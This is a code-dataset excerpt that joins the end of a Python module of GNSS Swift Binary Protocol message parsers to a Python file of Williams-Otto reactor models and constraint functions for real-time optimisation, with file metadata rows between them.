'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__x, offset, length) = get_s32(buf, offset, length)
ret['x'] = __x
(__y, offset, length) = get_s32(buf, offset, length)
ret['y'] = __y
(__z, offset, length) = get_s32(buf, offset, length)
ret['z'] = __z
(__accuracy, offset, length) = get_u16(buf, offset, length)
ret['accuracy'] = __accuracy
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.x = res['x']
self.y = res['y']
self.z = res['z']
self.accuracy = res['accuracy']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_VEL_NED_DEP_A = 0x0205
class MsgVelNEDDepA(SBP):
"""SBP class for message MSG_VEL_NED_DEP_A (0x0205).
You can have MSG_VEL_NED_DEP_A inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This message reports the velocity in local North East Down (NED)
coordinates. The NED coordinate system is defined as the local WGS84
tangent plane centered at the current position. The full GPS time is
given by the preceding MSG_GPS_TIME with the matching time-of-week (tow).
"""
__slots__ = ['tow',
'n',
'e',
'd',
'h_accuracy',
'v_accuracy',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__n, offset, length) = get_s32(buf, offset, length)
ret['n'] = __n
(__e, offset, length) = get_s32(buf, offset, length)
ret['e'] = __e
(__d, offset, length) = get_s32(buf, offset, length)
ret['d'] = __d
(__h_accuracy, offset, length) = get_u16(buf, offset, length)
ret['h_accuracy'] = __h_accuracy
(__v_accuracy, offset, length) = get_u16(buf, offset, length)
ret['v_accuracy'] = __v_accuracy
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.n = res['n']
self.e = res['e']
self.d = res['d']
self.h_accuracy = res['h_accuracy']
self.v_accuracy = res['v_accuracy']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_BASELINE_HEADING_DEP_A = 0x0207
class MsgBaselineHeadingDepA(SBP):
"""SBP class for message MSG_BASELINE_HEADING_DEP_A (0x0207).
You can have MSG_BASELINE_HEADING_DEP_A inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This message reports the baseline heading pointing from the base station
to the rover relative to True North. The full GPS time is given by the
preceding MSG_GPS_TIME with the matching time-of-week (tow).
"""
__slots__ = ['tow',
'heading',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__heading, offset, length) = get_u32(buf, offset, length)
ret['heading'] = __heading
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.heading = res['heading']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_PROTECTION_LEVEL = 0x0216
class MsgProtectionLevel(SBP):
"""SBP class for message MSG_PROTECTION_LEVEL (0x0216).
You can have MSG_PROTECTION_LEVEL inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This message reports the local vertical and horizontal protection levels
associated with a given LLH position solution. The full GPS time is given
by the preceding MSG_GPS_TIME with the matching time-of-week (tow).
"""
__slots__ = ['tow',
'vpl',
'hpl',
'lat',
'lon',
'height',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__vpl, offset, length) = get_u16(buf, offset, length)
ret['vpl'] = __vpl
(__hpl, offset, length) = get_u16(buf, offset, length)
ret['hpl'] = __hpl
(__lat, offset, length) = get_f64(buf, offset, length)
ret['lat'] = __lat
(__lon, offset, length) = get_f64(buf, offset, length)
ret['lon'] = __lon
(__height, offset, length) = get_f64(buf, offset, length)
ret['height'] = __height
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.vpl = res['vpl']
self.hpl = res['hpl']
self.lat = res['lat']
self.lon = res['lon']
self.height = res['height']
self.flags = res['flags']
return res, off, length
msg_classes = {
0x0102: MsgGPSTime,
0x0104: MsgGPSTimeGnss,
0x0103: MsgUtcTime,
0x0105: MsgUtcTimeGnss,
0x0208: MsgDops,
0x0209: MsgPosECEF,
0x0214: MsgPosECEFCov,
0x020A: MsgPosLLH,
0x0211: MsgPosLLHCov,
0x020B: MsgBaselineECEF,
0x020C: MsgBaselineNED,
0x020D: MsgVelECEF,
0x0215: MsgVelECEFCov,
0x020E: MsgVelNED,
0x0212: MsgVelNEDCov,
0x0229: MsgPosECEFGnss,
0x0234: MsgPosECEFCovGnss,
0x022A: MsgPosLLHGnss,
0x0231: MsgPosLLHCovGnss,
0x022D: MsgVelECEFGnss,
0x0235: MsgVelECEFCovGnss,
0x022E: MsgVelNEDGnss,
0x0232: MsgVelNEDCovGnss,
0x0213: MsgVelBody,
0x0210: MsgAgeCorrections,
0x0100: MsgGPSTimeDepA,
0x0206: MsgDopsDepA,
0x0200: MsgPosECEFDepA,
0x0201: MsgPosLLHDepA,
0x0202: MsgBaselineECEFDepA,
0x0203: MsgBaselineNEDDepA,
0x0204: MsgVelECEFDepA,
0x0205: MsgVelNEDDepA,
0x0207: MsgBaselineHeadingDepA,
0x0216: MsgProtectionLevel,
}
| 34.692341
| 100
| 0.646868
| 11,655
| 80,174
| 4.160875
| 0.039468
| 0.183854
| 0.120322
| 0.118404
| 0.918301
| 0.90962
| 0.893453
| 0.886298
| 0.867306
| 0.86178
| 0
| 0.019986
| 0.237384
| 80,174
| 2,311
| 101
| 34.692341
| 0.773167
| 0.272308
| 0
| 0.896315
| 0
| 0
| 0.068154
| 0
| 0
| 0
| 0.007223
| 0
| 0
| 1
| 0.043723
| false
| 0
| 0.004997
| 0
| 0.158026
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c7abc76f116a8695796758b508891e9d071017b6
| 21,518
|
py
|
Python
|
case_studies/RTO/systems.py
|
OptiMaL-PSE-Lab/Expensive-Black-Box-Optim-ChemEng
|
19c34dcff8c983926df501b93152fa3b3b0305d6
|
[
"MIT"
] | null | null | null |
case_studies/RTO/systems.py
|
OptiMaL-PSE-Lab/Expensive-Black-Box-Optim-ChemEng
|
19c34dcff8c983926df501b93152fa3b3b0305d6
|
[
"MIT"
] | null | null | null |
case_studies/RTO/systems.py
|
OptiMaL-PSE-Lab/Expensive-Black-Box-Optim-ChemEng
|
19c34dcff8c983926df501b93152fa3b3b0305d6
|
[
"MIT"
] | null | null | null |
# v2 includes shaping the TR with the curvature of the problem by a broyden update on derivatives
# and a BFGS update on the Hessian, however the TR becomes very small in some parts, so the approach
# does not seem to be too effective.
import time
import random
import numpy as np
import numpy.random as rnd
from scipy.spatial.distance import cdist
# import sobol_seq
from scipy.optimize import minimize
from scipy.optimize import broyden1
from scipy import linalg
import scipy
import matplotlib.pyplot as plt
import functools
from matplotlib.patches import Ellipse
from casadi import *
def Benoit_Model(u):
f = u[0] ** 2 + u[1] ** 2
return f
def con1_model(u):
g1 = 1. - u[0] + u[1] ** 2
return -g1
def Benoit_System(u):
f = u[0] ** 2 + u[1] ** 2 + u[0] * u[1] + np.random.normal(0., np.sqrt(1e-3))
return f
def con1_system(u):
g1 = 1. - u[0] + u[1] ** 2 + 2. * u[1] - 2. + np.random.normal(0., np.sqrt(1e-3))
return -g1
def con1_system_tight(u):
g1 = 1. - u[0] + u[1] ** 2 + 2. * u[1] + np.random.normal(0., np.sqrt(1e-3))
return -g1
def Benoit_System_noiseless(u):
f = u[0] ** 2 + u[1] ** 2 + u[0] * u[1] # + np.random.normal(0., np.sqrt(1e-3))
return f
def con1_system_noiseless(u):
g1 = 1. - u[0] + u[1] ** 2 + 2. * u[1] - 2. # + np.random.normal(0., np.sqrt(1e-3))
return -g1
def con1_system_tight_noiseless(u):
g1 = 1. - u[0] + u[1] ** 2 + 2. * u[1] # + np.random.normal(0., np.sqrt(1e-3))
return -g1
class WO_system:
# Parameters
Fa = 1.8275
Mt = 2105.2
# kinetic parameters
phi1 = - 3.
psi1 = -17.
phi2 = - 4.
psi2 = -29.
# Reference temperature
Tref = 110. + 273.15 # [=] K.
def __init__(self):
self.xd, self.xa, self.u, self.ODEeq, self.Aeq, self.states, self.algebraics, self.inputs = self.DAE_system()
self.eval = self.integrator_system()
def DAE_system(self):
# Define vectors with names of states
states = ['x']
nd = len(states)
xd = SX.sym('xd', nd)
for i in range(nd):
globals()[states[i]] = xd[i]
# Define vectors with names of algebraic variables
algebraics = ['Xa', 'Xb', 'Xc', 'Xe', 'Xp', 'Xg']
na = len(algebraics)
xa = SX.sym('xa', na)
for i in range(na):
globals()[algebraics[i]] = xa[i]
inputs = ['Fb', 'Tr']
nu = len(inputs)
u = SX.sym("u", nu)
for i in range(nu):
globals()[inputs[i]] = u[i]
# Reparametrization
k1 = 1.6599e6 * np.exp(-6666.7 / (Tr + 273.15))
k2 = 7.2117e8 * np.exp(-8333.3 / (Tr + 273.15))
k3 = 2.6745e12 * np.exp(-11111. / (Tr + 273.15))
# reaction rate
Fr = Fa + Fb
r1 = k1 * Xa * Xb * Mt
r2 = k2 * Xb * Xc * Mt
r3 = k3 * Xc * Xp * Mt
# residual for x
x_res = np.zeros((6, 1))
x_res[0, 0] = (Fa - r1 - Fr * Xa) / Mt
x_res[1, 0] = (Fb - r1 - r2 - Fr * Xb) / Mt
x_res[2, 0] = (+ 2 * r1 - 2 * r2 - r3 - Fr * Xc) / Mt
x_res[3, 0] = (+ 2 * r2 - Fr * Xe) / Mt
x_res[4, 0] = (+ r2 - 0.5 * r3 - Fr * Xp) / Mt
x_res[5, 0] = (+ 1.5 * r3 - Fr * Xg) / Mt
# Define vectors with banes of input variables
ODEeq = [0 * x]
# Declare algebraic equations
Aeq = []
Aeq += [(Fa - r1 - Fr * Xa) / Mt]
Aeq += [(Fb - r1 - r2 - Fr * Xb) / Mt]
Aeq += [(+ 2 * r1 - 2 * r2 - r3 - Fr * Xc) / Mt]
Aeq += [(+ 2 * r2 - Fr * Xe) / Mt]
Aeq += [(+ r2 - 0.5 * r3 - Fr * Xp) / Mt]
Aeq += [(+ 1.5 * r3 - Fr * Xg) / Mt]
return xd, xa, u, ODEeq, Aeq, states, algebraics, inputs
def integrator_system(self):
"""
This function constructs the integrator to be suitable with casadi environment, for the equations of the model
and the objective function with variable time step.
inputs: NaN
outputs: F: Function([x, u, dt]--> [xf, obj])
"""
xd, xa, u, ODEeq, Aeq, states, algebraics, inputs = self.DAE_system()
VV = Function('vfcn', [xa, u], [vertcat(*Aeq)], ['w0', 'u'], ['w'])
solver = rootfinder('solver', 'newton', VV)
return solver
def WO_obj_sys_ca(self, u):
x = self.eval(np.array([0.114805, 0.525604, 0.0260265, 0.207296, 0.0923376, 0.0339309]), u)
Fb = u[0]
Tr = u[1]
Fa = 1.8275
Fr = Fa + Fb
obj = -(1043.38 * x[4] * Fr +
20.92 * x[3] * Fr -
79.23 * Fa -
118.34 * Fb) + 0.5 * np.random.normal(0., 1)
return float(obj)
def WO_obj_sys_ca_noise_less(self, u):
x = self.eval(np.array([0.114805, 0.525604, 0.0260265, 0.207296, 0.0923376, 0.0339309]), u)
Fb = u[0]
Tr = u[1]
Fa = 1.8275
Fr = Fa + Fb
obj = -(1043.38 * x[4] * Fr +
20.92 * x[3] * Fr -
79.23 * Fa -
118.34 * Fb) # + 0.5*np.random.normal(0., 1)
return float(obj)
def WO_con1_sys_ca(self, u):
x = self.eval(np.array([0.114805, 0.525604, 0.0260265, 0.207296, 0.0923376, 0.0339309]), u)
pcon1 = x[0] - 0.12 + 5e-4 * np.random.normal(0., 1)
return float(pcon1.toarray()[0])
def WO_con2_sys_ca(self, u):
x = self.eval(np.array([0.114805, 0.525604, 0.0260265, 0.207296, 0.0923376, 0.0339309]), u)
pcon2 = x[5] - 0.08 + 5e-4 * np.random.normal(0., 1)
return float(pcon2.toarray()[0])
def WO_con1_sys_ca_noise_less(self, u):
x = self.eval(np.array([0.114805, 0.525604, 0.0260265, 0.207296, 0.0923376, 0.0339309]), u)
pcon1 = x[0] - 0.12 # + 5e-4*np.random.normal(0., 1)
return float(pcon1.toarray()[0])
def WO_con2_sys_ca_noise_less(self, u):
x = self.eval(np.array([0.114805, 0.525604, 0.0260265, 0.207296, 0.0923376, 0.0339309]), u)
pcon2 = x[5] - 0.08 # + 5e-4*np.random.normal(0., 1)
return float(pcon2.toarray()[0])
class WO_model:
# Parameters
Fa = 1.8275
Mt = 2105.2
# kinetic parameters
phi1 = - 3.
psi1 = -17.
phi2 = - 4.
psi2 = -29.
# Reference temperature
Tref = 110. + 273.15 # [=] K.
def __init__(self):
self.xd, self.xa, self.u, self.ODEeq, self.Aeq, self.states, self.algebraics, self.inputs = self.DAE_model()
self.eval = self.integrator_model()
def DAE_model(self):
# Define vectors with names of states
states = ['x']
nd = len(states)
xd = SX.sym('xd', nd)
for i in range(nd):
globals()[states[i]] = xd[i]
# Define vectors with names of algebraic variables
algebraics = ['Xa', 'Xb', 'Xe', 'Xp', 'Xg']
na = len(algebraics)
xa = SX.sym('xa', na)
for i in range(na):
globals()[algebraics[i]] = xa[i]
# Define vectors with banes of input variables
inputs = ['Fb', 'Tr']
nu = len(inputs)
u = SX.sym("u", nu)
for i in range(nu):
globals()[inputs[i]] = u[i]
k1 = np.exp(phi1) * np.exp((Tref / (Tr + 273.15) - 1) * psi1)
k2 = np.exp(phi2) * np.exp((Tref / (Tr + 273.15) - 1) * psi2)
# reaction rate
Fr = Fa + Fb
r1 = k1 * Xa * Xb * Xb * Mt
r2 = k2 * Xa * Xb * Xp * Mt
ODEeq = [0 * x]
# Declare algebraic equations
Aeq = []
Aeq += [Fa - r1 - r2 - Fr * Xa]
Aeq += [Fb - 2 * r1 - r2 - Fr * Xb]
Aeq += [+ 2 * r1 - Fr * Xe]
Aeq += [+ r1 - r2 - Fr * Xp]
Aeq += [+ 3 * r2 - Fr * Xg]
return xd, xa, u, ODEeq, Aeq, states, algebraics, inputs
def integrator_model(self):
"""
This function constructs the integrator to be suitable with casadi environment, for the equations of the model
and the objective function with variable time step.
inputs: NaN
outputs: F: Function([x, u, dt]--> [xf, obj])
"""
xd, xa, u, ODEeq, Aeq, states, algebraics, inputs = self.DAE_model()
VV = Function('vfcn', [xa, u], [vertcat(*Aeq)], ['w0', 'u'], ['w'])
solver = rootfinder('solver', 'newton', VV)
# model = functools.partial(solver, np.zeros(np.shape(xa)))
return solver
def WO_obj_ca(self, u):
x = self.eval(np.array([0.114805, 0.525604, 0.207296, 0.0923376, 0.0339309]), u)
Fb = u[0]
Tr = u[1]
Fa = 1.8275
Fr = Fa + Fb
obj = -(1043.38 * x[3] * Fr +
20.92 * x[2] * Fr -
79.23 * Fa -
118.34 * Fb)
return obj
def WO_con1_model_ca(self, u):
x = self.eval(np.array([0.114805, 0.525604, 0.207296, 0.0923376, 0.0339309]), u)
pcon1 = x[0] - 0.12 # + 5e-4*np.random.normal(1., 1)
return -pcon1.toarray()[0]
def WO_con2_model_ca(self, u):
x = self.eval(np.array([0.114805, 0.525604, 0.207296, 0.0923376, 0.0339309]), u)
pcon2 = x[4] - 0.08 # + 5e-4*np.random.normal(1., 1)
return -pcon2.toarray()[0]
def con_empty(u):
g1 = 0.
return -g1
def obj_empty(u):
f = 0.
return f
#
# def DAE_model():
# # Parameters
# Fa = 1.8275
# Mt = 2105.2
# # kinetic parameters
# phi1 = - 3.
# psi1 = -17.
# phi2 = - 4.
# psi2 = -29.
# # Reference temperature
# Tref = 110. + 273.15 # [=] K.
# # Define vectors with names of states
# states = ['x']
# nd = len(states)
# xd = SX.sym('xd', nd)
# for i in range(nd):
# globals()[states[i]] = xd[i]
#
# # Define vectors with names of algebraic variables
# algebraics = ['Xa', 'Xb', 'Xe', 'Xp', 'Xg']
# na = len(algebraics)
# xa = SX.sym('xa', na)
# for i in range(na):
# globals()[algebraics[i]] = xa[i]
#
# # Define vectors with banes of input variables
# inputs = ['Fb', 'Tr']
# nu = len(inputs)
# u = SX.sym("u", nu)
# for i in range(nu):
# globals()[inputs[i]] = u[i]
#
# k1 = np.exp(phi1) * np.exp((Tref / (Tr + 273.15) - 1) * psi1)
# k2 = np.exp(phi2) * np.exp((Tref / (Tr + 273.15) - 1) * psi2)
#
# # reaction rate
# Fr = Fa + Fb
# r1 = k1 * Xa * Xb * Xb * Mt
# r2 = k2 * Xa * Xb * Xp * Mt
# ODEeq = [0 * x]
#
# # Declare algebraic equations
# Aeq = []
#
# Aeq += [Fa - r1 - r2 - Fr * Xa]
# Aeq += [Fb - 2 * r1 - r2 - Fr * Xb]
# Aeq += [+ 2 * r1 - Fr * Xe]
# Aeq += [+ r1 - r2 - Fr * Xp]
# Aeq += [+ 3 * r2 - Fr * Xg]
#
# return xd, xa, u, ODEeq, Aeq, states, algebraics, inputs
#
#
# def integrator_model():
# """
# This function constructs the integrator to be suitable with casadi environment, for the equations of the model
# and the objective function with variable time step.
# inputs: NaN
# outputs: F: Function([x, u, dt]--> [xf, obj])
# """
#
# xd, xa, u, ODEeq, Aeq, states, algebraics, inputs = DAE_model()
# VV = Function('vfcn', [xa, u], [vertcat(*Aeq)], ['w0', 'u'], ['w'])
# solver = rootfinder('solver', 'newton', VV)
#
# # model = functools.partial(solver, np.zeros(np.shape(xa)))
# return solver
#
#
# def WO_obj_ca(u):
# solver = integrator_model()
# x = solver(np.zeros(5), u)
# Fb = u[0]
# Tr = u[1]
# Fa = 1.8275
# Fr = Fa + Fb
#
# obj = -(1043.38 * x[3] * Fr +
# 20.92 * x[2] * Fr -
# 79.23 * Fa -
# 118.34 * Fb)
#
# return obj
#
#
# def WO_con1_model_ca(u):
# solver = integrator_model()
# x = solver(np.zeros(5), u)
# pcon1 = x[0] - 0.12 # + 5e-4*np.random.normal(1., 1)
# return -pcon1.toarray()[0]
#
#
# def WO_con2_model_ca(u):
# solver = integrator_model()
# x = solver(np.zeros(5), u)
# pcon2 = x[4] - 0.08 # + 5e-4*np.random.normal(1., 1)
# return -pcon2.toarray()[0]
#
# # Parameters
#
#
#
#
# def DAE_system():
# Fa = 1.8275
# Mt = 2105.2
# # kinetic parameters
# phi1 = - 3.
# psi1 = -17.
# phi2 = - 4.
# psi2 = -29.
# # Reference temperature
# Tref = 110. + 273.15 # [=] K.
#
# # Define vectors with names of states
# states = ['x']
# nd = len(states)
# xd = SX.sym('xd', nd)
# for i in range(nd):
# globals()[states[i]] = xd[i]
#
# # Define vectors with names of algebraic variables
# algebraics = ['Xa', 'Xb', 'Xc', 'Xe', 'Xp', 'Xg']
# na = len(algebraics)
# xa = SX.sym('xa', na)
# for i in range(na):
# globals()[algebraics[i]] = xa[i]
#
# inputs = ['Fb', 'Tr']
# nu = len(inputs)
# u = SX.sym("u", nu)
# for i in range(nu):
# globals()[inputs[i]] = u[i]
#
# # Reparametrization
# k1 = 1.6599e6 * np.exp(-6666.7 / (Tr + 273.15))
# k2 = 7.2117e8 * np.exp(-8333.3 / (Tr + 273.15))
# k3 = 2.6745e12 * np.exp(-11111. / (Tr + 273.15))
#
# # reaction rate
# Fr = Fa + Fb
# r1 = k1 * Xa * Xb * Mt
# r2 = k2 * Xb * Xc * Mt
# r3 = k3 * Xc * Xp * Mt
#
# # residual for x
# x_res = np.zeros((6, 1))
# x_res[0, 0] = (Fa - r1 - Fr * Xa) / Mt
# x_res[1, 0] = (Fb - r1 - r2 - Fr * Xb) / Mt
# x_res[2, 0] = (+ 2 * r1 - 2 * r2 - r3 - Fr * Xc) / Mt
# x_res[3, 0] = (+ 2 * r2 - Fr * Xe) / Mt
# x_res[4, 0] = (+ r2 - 0.5 * r3 - Fr * Xp) / Mt
# x_res[5, 0] = (+ 1.5 * r3 - Fr * Xg) / Mt
# # Define vectors with banes of input variables
#
# ODEeq = [0 * x]
#
# # Declare algebraic equations
# Aeq = []
#
# Aeq += [(Fa - r1 - Fr * Xa) / Mt]
# Aeq += [(Fb - r1 - r2 - Fr * Xb) / Mt]
# Aeq += [(+ 2 * r1 - 2 * r2 - r3 - Fr * Xc) / Mt]
# Aeq += [(+ 2 * r2 - Fr * Xe) / Mt]
# Aeq += [(+ r2 - 0.5 * r3 - Fr * Xp) / Mt]
# Aeq += [(+ 1.5 * r3 - Fr * Xg) / Mt]
#
# return xd, xa, u, ODEeq, Aeq, states, algebraics, inputs
#
#
# def integrator_system():
# """
# This function constructs the integrator to be suitable with casadi environment, for the equations of the model
# and the objective function with variable time step.
# inputs: NaN
# outputs: F: Function([x, u, dt]--> [xf, obj])
# """
#
# xd, xa, u, ODEeq, Aeq, states, algebraics, inputs = DAE_system()
# VV = Function('vfcn', [xa, u], [vertcat(*Aeq)], ['w0', 'u'], ['w'])
# solver = rootfinder('solver', 'newton', VV)
#
# return solver
#
#
# def WO_obj_sys_ca(u):
# solver = integrator_system()
# x = solver(np.zeros(6), u)
# Fb = u[0]
# Tr = u[1]
# Fa = 1.8275
# Fr = Fa + Fb
#
# obj = -(1043.38 * x[4] * Fr +
# 20.92 * x[3] * Fr -
# 79.23 * Fa -
# 118.34 * Fb)
#
# return obj
#
#
# def WO_con1_sys_ca(u):
# solver = integrator_system()
# x = solver(np.zeros(6), u)
# pcon1 = x[0] - 0.12 # + 5e-4*np.random.normal(1., 1)
#
# return -pcon1
#
#
# def WO_con2_sys_ca(u):
# solver = integrator_system()
# x = solver(np.zeros(6), u)
# pcon2 = x[5] - 0.08 # + 5e-4*np.random.normal(1., 1)
#
# return -pcon2
#
options = {'disp': False, 'maxiter': 10000} # solver options
# Parameters
Fa = 1.8275
Mt = 2105.2
# kinetic parameters
phi1 = - 3.
psi1 = -17.
phi2 = - 4.
psi2 = -29.
# Reference temperature
Tref = 110. + 273.15 # [=] K.
# --- residual function for model opt --- #
def WO_nonlinear_f_model_opt(x, u_):
Fb = u_[0]
Tr = u_[1]
# states of the system
Xa = x[0] # Mass fraction
Xb = x[1] # Mass fraction
Xe = x[2] # Mass fraction
Xp = x[3] # Mass fraction
Xg = x[4] # Mass fraction
# Reparametrization
k1 = np.exp(phi1) * np.exp((Tref / (Tr + 273.15) - 1) * psi1)
k2 = np.exp(phi2) * np.exp((Tref / (Tr + 273.15) - 1) * psi2)
# reaction rate
Fr = Fa + Fb
r1 = k1 * Xa * Xb * Xb * Mt
r2 = k2 * Xa * Xb * Xp * Mt
# residual for x
x_res = np.zeros((5, 1))
x_res[0, 0] = Fa - r1 - r2 - Fr * Xa
x_res[1, 0] = Fb - 2 * r1 - r2 - Fr * Xb
x_res[2, 0] = + 2 * r1 - Fr * Xe
x_res[3, 0] = + r1 - r2 - Fr * Xp
x_res[4, 0] = + 3 * r2 - Fr * Xg
return np.sum(x_res ** 2)
# --- residual function for model --- #
def WO_nonlinear_f_model(u_, x):
Fb = u_[0]
Tr = u_[1]
# states of the system
Xa = x[0] # Mass fraction
Xb = x[1] # Mass fraction
Xe = x[2] # Mass fraction
Xp = x[3] # Mass fraction
Xg = x[4] # Mass fraction
# Reparametrization
k1 = np.exp(phi1) * np.exp((Tref / (Tr + 273.15) - 1) * psi1)
k2 = np.exp(phi2) * np.exp((Tref / (Tr + 273.15) - 1) * psi2)
# reaction rate
Fr = Fa + Fb
r1 = k1 * Xa * Xb * Xb * Mt
r2 = k2 * Xa * Xb * Xp * Mt
# residual for x
x_res = np.zeros((5, 1))
x_res[0, 0] = Fa - r1 - r2 - Fr * Xa
x_res[1, 0] = Fb - 2 * r1 - r2 - Fr * Xb
x_res[2, 0] = + 2 * r1 - Fr * Xe
x_res[3, 0] = + r1 - r2 - Fr * Xp
x_res[4, 0] = + 3 * r2 - Fr * Xg
return x_res
# --- WO model objective --- #
def WO_Model_obj(u):
x_guess = np.ones((5, 1)) * 0.2
WO_f_model = functools.partial(WO_nonlinear_f_model, u)
x_solved = broyden1(WO_f_model, x_guess, f_tol=1e-12)
# definitions
Fa = 1.8275
Fb = u[0]
Fr = Fa + Fb
# calculating objective
obj = -(1043.38 * x_solved[3, 0] * Fr +
20.92 * x_solved[2, 0] * Fr -
79.23 * Fa -
118.34 * Fb)
return obj
# --- WO model con1 --- #
def WO_Model_con1(u):
x_guess = np.ones((5, 1)) * 0.2
WO_f_model = functools.partial(WO_nonlinear_f_model, u)
x_solved = broyden1(WO_f_model, x_guess, f_tol=1e-12)
# calculating con1
con1 = x_solved[0, 0] - 0.12
return -con1
# --- WO model con1 opt --- #
def WO_Model_con1_opt(u):
x_guess = np.ones((5, 1)) * 0.2
res = minimize(WO_nonlinear_f_model_opt, x_guess, args=(u),
method='BFGS', options=options, tol=1e-12)
x_solved = res.x
# calculating con1
con1 = x_solved[0] - 0.12
return -con1
# --- WO model con2 --- #
def WO_Model_con2(u):
x_guess = np.ones((5, 1)) * 0.2
WO_f_model = functools.partial(WO_nonlinear_f_model, u)
x_solved = broyden1(WO_f_model, x_guess, f_tol=1e-12)
# calculating con1
con2 = x_solved[4, 0] - 0.08
return -con2
# --- WO model con2 opt --- #
def WO_Model_con2_opt(u):
x_guess = np.ones((5, 1)) * 0.2
res = minimize(WO_nonlinear_f_model_opt, x_guess, args=(u),
method='BFGS', options=options, tol=1e-12)
x_solved = res.x
# calculating con1
con2 = x_solved[4] - 0.08
return -con2
# Parameters
Fa = 1.8275
Mt = 2105.2
# kinetic parameters
phi1 = - 3.
psi1 = -17.
phi2 = - 4.
psi2 = -29.
# Reference temperature
Tref = 110. + 273.15 # [=] K.
def DAE_system():
# Define vectors with names of states
states = ['x']
nd = len(states)
xd = SX.sym('xd', nd)
for i in range(nd):
globals()[states[i]] = xd[i]
# Define vectors with names of algebraic variables
algebraics = ['Xa', 'Xb', 'Xc', 'Xe', 'Xp', 'Xg']
na = len(algebraics)
xa = SX.sym('xa', na)
for i in range(na):
globals()[algebraics[i]] = xa[i]
inputs = ['Fb', 'Tr']
nu = len(inputs)
u = SX.sym("u", nu)
for i in range(nu):
globals()[inputs[i]] = u[i]
# Reparametrization
k1 = 1.6599e6 * np.exp(-6666.7 / (Tr + 273.15))
k2 = 7.2117e8 * np.exp(-8333.3 / (Tr + 273.15))
k3 = 2.6745e12 * np.exp(-11111. / (Tr + 273.15))
# reaction rate
Fr = Fa + Fb
r1 = k1 * Xa * Xb * Mt
r2 = k2 * Xb * Xc * Mt
r3 = k3 * Xc * Xp * Mt
# residual for x
x_res = np.zeros((6, 1))
x_res[0, 0] = (Fa - r1 - Fr * Xa) / Mt
x_res[1, 0] = (Fb - r1 - r2 - Fr * Xb) / Mt
x_res[2, 0] = (+ 2 * r1 - 2 * r2 - r3 - Fr * Xc) / Mt
x_res[3, 0] = (+ 2 * r2 - Fr * Xe) / Mt
x_res[4, 0] = (+ r2 - 0.5 * r3 - Fr * Xp) / Mt
x_res[5, 0] = (+ 1.5 * r3 - Fr * Xg) / Mt
# Define vectors with banes of input variables
ODEeq = [0 * x]
# Declare algebraic equations
Aeq = []
Aeq += [(Fa - r1 - Fr * Xa) / Mt]
Aeq += [(Fb - r1 - r2 - Fr * Xb) / Mt]
Aeq += [(+ 2 * r1 - 2 * r2 - r3 - Fr * Xc) / Mt]
Aeq += [(+ 2 * r2 - Fr * Xe) / Mt]
Aeq += [(+ r2 - 0.5 * r3 - Fr * Xp) / Mt]
Aeq += [(+ 1.5 * r3 - Fr * Xg) / Mt]
return xd, xa, u, ODEeq, Aeq, states, algebraics, inputs
def integrator_system():
"""
This function constructs the integrator to be suitable with casadi environment, for the equations of the model
and the objective function with variable time step.
inputs: NaN
outputs: F: Function([x, u, dt]--> [xf, obj])
"""
xd, xa, u, ODEeq, Aeq, states, algebraics, inputs = DAE_system()
VV = Function('vfcn', [xa, u], [vertcat(*Aeq)], ['w0', 'u'], ['w'])
solver = rootfinder('solver', 'newton', VV)
return solver
def WO_obj_sys_ca(u):
solver = integrator_system()
x = solver(np.zeros(6), u)
Fb = u[0]
Tr = u[1]
Fa = 1.8275
Fr = Fa + Fb
obj = -(1043.38 * x[4] * Fr +
20.92 * x[3] * Fr -
79.23 * Fa -
118.34 * Fb)
return obj
def WO_con1_sys_ca(u):
solver = integrator_system()
x = solver(np.zeros(6), u)
pcon1 = x[0] - 0.12 # + 5e-4*np.random.normal(1., 1)
return -pcon1.toarray()[0]
def WO_con2_sys_ca(u):
solver = integrator_system()
x = solver(np.zeros(6), u)
pcon2 = x[5] - 0.08 # + 5e-4*np.random.normal(1., 1)
return -pcon2.toarray()[0]
| 27.237975
| 118
| 0.509852
| 3,315
| 21,518
| 3.241629
| 0.069382
| 0.013028
| 0.026056
| 0.015355
| 0.902941
| 0.898009
